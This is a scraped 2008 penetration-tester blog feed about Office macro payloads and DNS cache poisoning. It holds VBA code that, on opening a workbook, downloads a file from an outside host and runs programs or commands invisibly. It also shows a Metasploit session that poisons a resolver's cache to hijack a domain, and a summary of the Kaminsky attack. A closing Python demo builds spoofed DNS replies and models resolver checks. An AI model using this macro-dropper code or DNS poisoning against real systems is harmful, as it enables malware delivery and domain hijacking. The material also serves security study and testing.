href="http://www.eweek.com/c/a/Security/Hacker-Pours-Cold-Water-on-Windows-Server-2008-Security-Design/">the</a> <a href="http://securitywatch.eweek.com/flaws/microsoft_belatedly_admits_to_windows_server_2008_token_kidnapping.html">token-kidnapping</a> <a href="http://nomoreroot.blogspot.com/2008/10/token-kidnapping-windows-2008-poc.html">exploit</a> for Windows Server 2003/2008 (and supposedly XP SP2?) that allows code already running as NETWORK SERVICE or LOCAL SERVICE (an IIS worker process, for example) to gain SYSTEM privileges. 
Unfortunately, I haven't had time to play with it yet.Nathan Keltnerhttp://www.blogger.com/profile/08165445198675206275noreply@blogger.com3tag:blogger.com,1999:blog-8542235839869152787.post-10433959315421240662008-11-16T18:10:00.001-08:002008-11-17T07:22:42.408-08:00VBA Function to Download FilesSo, what happens if the payload you want to run is too large to directly paste into an Excel or Word document with metasploit's <a href="http://blogs.securiteam.com/index.php/archives/1161">exe2vba</a>? Why don't you just download it from the internet?<br /><br />Unfortunately, MS didn't decide to give us a copy of wget, so we have to write it ourselves. This function uses the XMLHTTP object to download binary files and write them to disk. I don't remember where I found this code, but just for full disclosure, I didn't write it:<br /><br /><p><TT>Function Download_File(ByVal vWebFile As String, ByVal vLocalFile As String) As Boolean<br /> Dim oXMLHTTP As Object, i As Long, vFF As Long, oResp() As Byte<br /> <br /> 'You can also set a ref. 
to Microsoft XML, and Dim oXMLHTTP as MSXML2.XMLHTTP<br /> Set oXMLHTTP = CreateObject("MSXML2.XMLHTTP")<br /> oXMLHTTP.Open "GET", vWebFile, False 'Open socket to get the website<br /> oXMLHTTP.Send 'send request<br /> <br /> 'Wait for request to finish<br /> Do While oXMLHTTP.readyState <> 4<br /> DoEvents<br /> Loop<br /> <br /> 'Anything but HTTP 200 is a failure; the Boolean return value stays False<br /> If oXMLHTTP.Status <> 200 Then Exit Function<br /> <br /> oResp = oXMLHTTP.responseBody 'Returns the results as a byte array<br /> <br /> 'Create local file and save results to it<br /> vFF = FreeFile<br /> If Dir(vLocalFile) <> "" Then Kill vLocalFile<br /> Open vLocalFile For Binary As #vFF<br /> Put #vFF, , oResp<br /> Close #vFF<br /> <br /> 'Clear memory<br /> Set oXMLHTTP = Nothing<br /> Download_File = True<br />End Function</TT></P><br />Here's the call that will download a copy of the <a href="http://www.ritlabs.com/en/products/tinyweb/">Tiny Web Server</a> to the %TEMP% directory and use the local installation of Winzip to unzip it (only if the download actually succeeded):<br /><P><TT>Sub Workbook_Open()<br /> 'Download tiny web server to the %TEMP% directory, use local copy of winzip to unzip<br /> 'Obviously in a real world application you'd want to bring your own unzipper<br /> If Download_File("http://www.ritlabs.com/download/tinyweb/tinyweb.zip", Environ("TEMP") & "\tinyweb.zip") Then<br /> Run_Program "winzip", "-e -o %TEMP%\tinyweb.zip %TEMP%", INVISIBLE, WAIT<br /> End If<br />End Sub</TT></P>Nathan Keltnerhttp://www.blogger.com/profile/08165445198675206275noreply@blogger.com6tag:blogger.com,1999:blog-8542235839869152787.post-87341923900001919972008-11-16T17:49:00.000-08:002008-11-17T07:21:47.363-08:00On VBA in Excel and Word Documents...There have been a <a href="http://seclists.org/pen-test/2008/Nov/0041.html">few</a> <a href="http://blogs.securiteam.com/index.php/archives/1161">posts</a> around the interwebs recently on how to use VBA to boobytrap Excel or Word documents with executables that will run on startup. 
I've been playing with it a bit and thought I'd write a series of posts on my findings to store this info in one place, in case anyone else finds this stuff useful in pentests.<br /><br />First, a quick note on converting executables to store in VBA. Based on my testing, the default Visual Basic Editor (VBE) that comes with MS Office 2003 (haven't tested 2007 yet) has a relatively low memory limit on how much you can store inside the script sections. This correlates to a max executable filesize of around 32k on my system. Anything larger than that and you won't be able to paste in the output from metasploit's exe2vba: you will receive the error message "Not Enough Memory".<br /><br />I'm sure you could convert this script to allow you to store the hex strings inside a hidden, locked worksheet and reference it from the code sections. I don't know how many of you will run into this, as many of the metasploit payloads are only around 10k.<br /><br />Back to VBA, we'll start with a couple of simple functions that will allow you to run invisible commands or programs on the system:<br /><p><tt>Sub Run_Cmd(command, visibility, wait_on_execute)<br /> Dim WshShell As Variant<br /> Set WshShell = CreateObject("WScript.Shell")<br /> WshShell.Run "%COMSPEC% /c " & command, visibility, wait_on_execute<br />End Sub<br /><br />Sub Run_Program(program, arguments, visibility, wait_on_execute)<br /> Dim WshShell As Variant<br /> Set WshShell = CreateObject("WScript.Shell")<br /> WshShell.Run program & " " & arguments & " ", visibility, wait_on_execute<br />End Sub<br /></TT></P><br />These would be called from within the "ThisWorkbook" tab in VBE with a function like:<br /><p><TT>Const VISIBLE = 1, INVISIBLE = 0<br />Const WAIT = True, NOWAIT = False<br /><br />Sub Workbook_Open()<br /> Run_Cmd "ping 127.0.0.1", VISIBLE, WAIT<br /> Run_Program "notepad.exe", "", VISIBLE, NOWAIT<br />End Sub </TT></P><br />INVISIBLE / VISIBLE does just what you would think: toggles the visibility 
of the program or command as you wish. WAIT / NOWAIT also functions as you would expect; if set to WAIT, the VBA execution will halt until the process finishes. NOWAIT continues execution as soon as the program/command begins.Nathan Keltnerhttp://www.blogger.com/profile/08165445198675206275noreply@blogger.com1tag:blogger.com,1999:blog-8542235839869152787.post-77306182265448874532008-07-25T07:26:00.001-07:002008-07-25T15:17:58.151-07:00AV Industry: Then and NowVia twitter:<br /><img src="http://blog.rogeriopvl.com/wp-content/uploads/avindustry.gif" />Nathan Keltnerhttp://www.blogger.com/profile/08165445198675206275noreply@blogger.com3tag:blogger.com,1999:blog-8542235839869152787.post-87757224644647234862008-07-24T08:44:00.000-07:002008-07-25T15:18:24.085-07:00U CAN HAZ METASPLOIT TOO. ENJOI.(svn update will pull the current code in... it's under intense revisioning right now; something like 6 revisions in 5 hours this morning)<br /><br />The current version will actually replace the cached entries for the name server itself, allowing you to hijack entire domains at once. Previous code (from earlier this morning) would allow you to take over individual entries (e.g. 
randomwhatever.example.com), but now you can take over (*.example.com).<br /><br />Patch up, children.<br /><br />-n<br /><br /><a href="http://www.caughq.org/exploits/CAU-EX-2008-0003.txt">http://www.caughq.org/exploits/CAU-EX-2008-0003.txt</a><br /><br /># /msf3/msfconsole<br /><br /> ## ### ## ##<br />## ## #### ###### #### ##### ##### ## #### ######<br />####### ## ## ## ## ## ## ## ## ## ## ### ##<br />####### ###### ## ##### #### ## ## ## ## ## ## ##<br />## # ## ## ## ## ## ## ##### ## ## ## ## ##<br />## ## #### ### ##### ##### ## #### #### #### ###<br /> ##<br /><br /><br /> =[ msf v3.2-release<br />+ -- --=[ 298 exploits - 124 payloads<br />+ -- --=[ 18 encoders - 6 nops<br /> =[ 73 aux<br /><br />msf > use auxiliary/spoof/dns/bailiwicked_domain<br />msf auxiliary(bailiwicked_domain) > set RHOST A.B.C.D<br />RHOST => A.B.C.D<br />msf auxiliary(bailiwicked_domain) > set DOMAIN example.com<br />DOMAIN => example.com<br />msf auxiliary(bailiwicked_domain) > set NEWDNS dns01.metasploit.com<br />NEWDNS => dns01.metasploit.com<br />msf auxiliary(bailiwicked_domain) > set SRCPORT 0<br />SRCPORT => 0<br />msf auxiliary(bailiwicked_domain) > check<br />[*] Using the Metasploit service to verify exploitability...<br />[*] >> ADDRESS: A.B.C.D PORT: 50391<br />[*] >> ADDRESS: A.B.C.D PORT: 50391<br />[*] >> ADDRESS: A.B.C.D PORT: 50391<br />[*] >> ADDRESS: A.B.C.D PORT: 50391<br />[*] >> ADDRESS: A.B.C.D PORT: 50391<br />[*] FAIL: This server uses static source ports and is vulnerable to poisoning<br />msf auxiliary(bailiwicked_domain) > dig +short -t ns example.com @A.B.C.D<br />[*] exec: dig +short -t ns example.com @A.B.C.D<br /><br />b.iana-servers.net.<br />a.iana-servers.net.<br /><br />msf auxiliary(bailiwicked_domain) > run<br />[*] Switching to target port 50391 based on Metasploit service<br />[*] Targeting nameserver A.B.C.D for injection of example.com. 
nameservers as dns01.metasploit.com<br />[*] Querying recon nameserver for example.com.'s nameservers...<br />[*] Got an NS record: example.com. 171957 IN NS b.iana-servers.net.<br />[*] Querying recon nameserver for address of b.iana-servers.net....<br />[*] Got an A record: b.iana-servers.net. 171028 IN A 193.0.0.236<br />[*] Checking Authoritativeness: Querying 193.0.0.236 for example.com....<br />[*] b.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as<br />[*] Got an NS record: example.com. 171957 IN NS a.iana-servers.net.<br />[*] Querying recon nameserver for address of a.iana-servers.net....<br />[*] Got an A record: a.iana-servers.net. 171414 IN A 192.0.34.43<br />[*] Checking Authoritativeness: Querying 192.0.34.43 for example.com....<br />[*] a.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as<br />[*] Attempting to inject poison records for example.com.'s nameservers into A.B.C.D:50391...<br />[*] Sent 1000 queries and 20000 spoofed responses...<br />[*] Sent 2000 queries and 40000 spoofed responses...<br />[*] Sent 3000 queries and 60000 spoofed responses...<br />[*] Sent 4000 queries and 80000 spoofed responses...<br />[*] Sent 5000 queries and 100000 spoofed responses...<br />[*] Sent 6000 queries and 120000 spoofed responses...<br />[*] Sent 7000 queries and 140000 spoofed responses...<br />[*] Sent 8000 queries and 160000 spoofed responses...<br />[*] Sent 9000 queries and 180000 spoofed responses...<br />[*] Sent 10000 queries and 200000 spoofed responses...<br />[*] Sent 11000 queries and 220000 spoofed responses...<br />[*] Sent 12000 queries and 240000 spoofed responses...<br />[*] Sent 13000 queries and 260000 spoofed responses...<br />[*] Poisoning successful after 13250 attempts: example.com. 
== dns01.metasploit.com<br />[*] Auxiliary module execution completed<br /><br />msf auxiliary(bailiwicked_domain) > dig +short -t ns example.com @A.B.C.D<br />[*] exec: dig +short -t ns example.com @A.B.C.D<br /><br />dns01.metasploit.com.Nathan Keltnerhttp://www.blogger.com/profile/08165445198675206275noreply@blogger.com2tag:blogger.com,1999:blog-8542235839869152787.post-76866730310959649672008-07-22T08:53:00.000-07:002008-07-25T15:18:44.570-07:00More info on DNS Hierarchy and determining bailiwickAnyone interested in reading more on how DNS zones and hierarchies ("bailiwick") are determined should check these articles from linuxjournal.com:<br /><br /><a href="http://www.linuxjournal.com/article/9905">Digging Up Dirt in the DNS Hierarchy, Part I</a><br /><a href="http://www.linuxjournal.com/article/9928">Digging Up Dirt in the DNS Hierarchy, Part II</a><br /><br />It should clear it up for anyone still confused about how DNS is supposed to function and why the current protections (pre-Kaminsky) were put in place.Nathan Keltnerhttp://www.blogger.com/profile/08165445198675206275noreply@blogger.com0tag:blogger.com,1999:blog-8542235839869152787.post-13714080395884001452008-07-21T15:05:00.000-07:002008-07-22T09:11:21.081-07:00Kaminsky's DNS Issue Accidentally Leaked?[Update 2: Thomas Ptacek of Matasano has since posted a public apology to Dan et al for the accidental posting. <a href="http://www.matasano.com/log/1105/regarding-the-post-on-chargen-earlier-today/">Regarding The Post On Chargen Earlier Today</a>.]<br /><br />[Update 1: Upon re-reading Halvar's explanation, it appears he got it closer than I originally thought, missing only the part about "bailiwick checking", which prevents a request for arbitrary.invisibledenizen.org from poisoning ns1.google.com. Halvar's solution, as written, would fail as I understand it. 
But one minor change (to using subdomains) makes it all function.]<br /><br />It appears matasano <a href="http://www.matasano.com/log/1103/reliable-dns-forgery-in-2008-kaminskys-discovery/">posted an explanation</a> of Dan Kaminsky's <a href="http://securosis.com/2008/07/08/dan-kaminsky-discovers-fundamental-issue-in-dns-massive-multivendor-patch-released/">DNS issue</a> to their blog today, but it looks like it may have been yanked back down. My google reader account nabbed it via the RSS feed while it was up.<br /><br />It looks like maybe they had this typed up, ready to hit "post" as soon as someone else figured it out? They had advance knowledge of the issue via conference calls with Kaminsky, and when Halvar Flake <a href="http://addxorrol.blogspot.com/2008/07/on-dans-request-for-no-speculation.html">posted some speculation</a> on what the issue was, they referred to Halvar's post and their explanation hit the matasano blog. But Halvar's speculation was not the full issue; only a re-hash of previously known issues. Halvar's ideas were close, but incomplete. Matasano filled in the missing details, possibly by accident. :)<br /><br />Rather than re-post their entire section and get crossways with copyright complaints, here's a summary of their explanation:<br /><br /><ol><li>There's a general principle of cryptography: if you have to guess a secret value (call it Variable A), it helps enormously to get as many independent attempts at guessing it as possible. (See wikipedia's <a href="http://en.wikipedia.org/wiki/Birthday_attack">entry</a> on "birthday attack" or <a href="http://www.google.com/search?hl=en&q=%22birthday+attack%22">google</a> for more details.)<br /></li><li>DNS only uses a random 16-bit transaction ID (65536 possible values) that must be guessed in order to poison a DNS server's cache, and it must be guessed before the legitimate answer comes back. 
This is hard to do against any single request: you get one guess per outstanding query, and once the genuine answer arrives the record sits in the cache for its TTL before you can try again.<br /></li><li>If you can slam a server with tons of requests, Point 1 above comes into play and allows you to reliably and quickly get at least 1 DNS cache poisoning packet to match the transaction ID. (Halvar's guess said this: force requests for random0000001.com, random0000002.com, etc, to generate a large number of values of Variable A. Eventually you'll guess one right.)</li><li>On its own this is not very useful. So what if I can poison bankofamerica349543.com?</li><li>OK, so what about <a href="http://en.wikipedia.org/wiki/Wildcard_DNS_record">DNS wildcards</a>? If you are able to poison random00001.invisibledenizen.org, what does that get you? Enter the <a href="http://en.wikipedia.org/wiki/DNS_cache_poisoning#Redirect_the_target_domain.27s_nameserver">additional RR set</a> field. This allows you to piggyback additional DNS records on top of what was requested. For security reasons (the resolver's bailiwick check), a resolver only accepts additional records for names under the zone the query was for. (E.g., if I submit a request for arbitrary.domain.com, the additional response section can only return info for domain.com sub-domains.)<br /></li><li>So the attack is this: do the above to cache poison randomXXXX.invisibledenizen.org, and in each packet have the additional RR return answers for ns1.invisibledenizen.org. Whenever random42156.invisibledenizen.org is the magical response that finds the transaction ID and poisons the cache, it will also poison the record for my nameserver, ns1.invisibledenizen.org.</li></ol>Matasano stated this attack could occur in "less than 10 seconds" with current internet speeds.<br /><br />Anyone want to throw together a metasploit aux module for this?<br /><br />:)<br /><br />-NNathan Keltnerhttp://www.blogger.com/profile/08165445198675206275noreply@blogger.com10
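Points 5 and 6 of the summary above, and the bailiwick point from Update 1, in runnable form. This is an added example written for this page; it is not code from Matasano's post, from Halvar's post, or from the Metasploit bailiwicked_domain module. It builds the spoofed reply to one bait query (the answer for the throwaway name plus the zone's NS record and rogue glue in the authority/additional sections), then applies the two checks a caching resolver makes before accepting it: the transaction ID must match, and every record must be inside the bailiwick of the query. The names, addresses and packets are constructed for the demo, and simulate_poisoning() models only the transaction ID race (distinct guesses per bait query, 16-bit ID), not the timing race against the genuine reply.

```python
"""Added example for this page, not Matasano's or Metasploit's code: a spoofed
Kaminsky-style reply and the resolver checks (TXID, bailiwick) that gate it.
Every name, address and packet here is constructed for the demo."""
import random
import struct

TYPE_A, TYPE_NS, CLASS_IN = 1, 2, 1

def encode_name(name):
    """Wire form of a dotted name: length-prefixed labels plus the root byte."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"

def decode_name(data, off):
    """Read a (possibly compressed) name at off; return (name, next offset)."""
    labels, end, jumped = [], None, False
    while True:
        length = data[off]
        if length & 0xC0 == 0xC0:  # compression pointer
            if not jumped:
                end = off + 2
            off = struct.unpack("!H", data[off:off + 2])[0] & 0x3FFF
            jumped = True
            continue
        off += 1
        if length == 0:
            break
        labels.append(data[off:off + length].decode("ascii"))
        off += length
    return ".".join(labels) + ".", (end if jumped else off)

def rr(name, rtype, rdata, ttl=86400):  # NAME TYPE CLASS TTL RDLENGTH RDATA
    return encode_name(name) + struct.pack("!HHIH", rtype, CLASS_IN, ttl, len(rdata)) + rdata

def a_rdata(ip):
    return bytes(int(o) for o in ip.split("."))

def build_spoofed_response(txid, qname, zone, rogue_ns, rogue_ip):
    """Spoofed reply to the bait query for qname. The answer for the throwaway
    name is irrelevant; the payload is the zone's NS record (authority section)
    plus glue for the rogue nameserver (additional section)."""
    header = struct.pack("!HHHHHH", txid, 0x8400, 1, 1, 1, 1)  # flags: QR=1, AA=1
    question = encode_name(qname) + struct.pack("!HH", TYPE_A, CLASS_IN)
    answer = rr(qname, TYPE_A, a_rdata("192.0.2.1"))
    authority = rr(zone, TYPE_NS, encode_name(rogue_ns))
    additional = rr(rogue_ns, TYPE_A, a_rdata(rogue_ip))
    return header + question + answer + authority + additional

def parse_message(data):
    """Return (txid, [answer, authority, additional]) with (name, type, value) records."""
    txid, _flags, qd, an, ns, ar = struct.unpack("!HHHHHH", data[:12])
    off = 12
    for _ in range(qd):
        _, off = decode_name(data, off)
        off += 4  # QTYPE + QCLASS
    sections = []
    for count in (an, ns, ar):
        recs = []
        for _ in range(count):
            name, off = decode_name(data, off)
            rtype, _cls, _ttl, rdlen = struct.unpack("!HHIH", data[off:off + 10])
            off += 10
            if rtype == TYPE_NS:
                value, _ = decode_name(data, off)
            elif rtype == TYPE_A:
                value = ".".join(str(b) for b in data[off:off + rdlen])
            else:
                value = data[off:off + rdlen]
            off += rdlen
            recs.append((name, rtype, value))
        sections.append(recs)
    return txid, sections

def in_bailiwick(name, zone):
    """Bailiwick check: the record's owner name is the zone or lies below it."""
    name, zone = name.lower(), zone.lower()
    return name == zone or name.endswith("." + zone)

def resolver_accept(data, expected_txid, zone):
    """What a bailiwick-checking resolver caches from a reply to a query under
    zone: nothing on a TXID mismatch, otherwise only the in-zone records."""
    txid, (answer, authority, additional) = parse_message(data)
    if txid != expected_txid:
        return []
    return [r for r in answer + authority + additional if in_bailiwick(r[0], zone)]

def simulate_poisoning(responses_per_query, seed=0, max_queries=1000000):
    """Bait queries for fresh random names until a spoofed TXID hits. Each query
    is raced by responses_per_query distinct guesses; a fresh name is never
    cached, so a miss just means asking again. Returns queries needed or None."""
    rng = random.Random(seed)
    for queries in range(1, max_queries + 1):
        real_txid = rng.randrange(65536)
        if real_txid in rng.sample(range(65536), responses_per_query):
            return queries
    return None

if __name__ == "__main__":
    zone = "invisibledenizen.org."
    pkt = build_spoofed_response(0x1234, "random42156." + zone, zone, "ns1." + zone, "198.51.100.7")
    print("cached:", resolver_accept(pkt, 0x1234, zone), "queries:", simulate_poisoning(20))
```

With the zone set to invisibledenizen.org, the rogue NS and glue records survive resolver_accept(); rebuild the same packet with the NS pointing at ns1.google.com and only the useless answer for the throwaway name is kept, which is exactly why Halvar's out-of-zone variant fails and the in-zone one works. With 20 guesses per bait query (the ratio in the msf transcript above, 20000 spoofed responses per 1000 queries) the simulation needs on the order of 65536/20 queries, and it only gets worse for the attacker once the source port is randomised as well, which is what the patch the transcript checks for does.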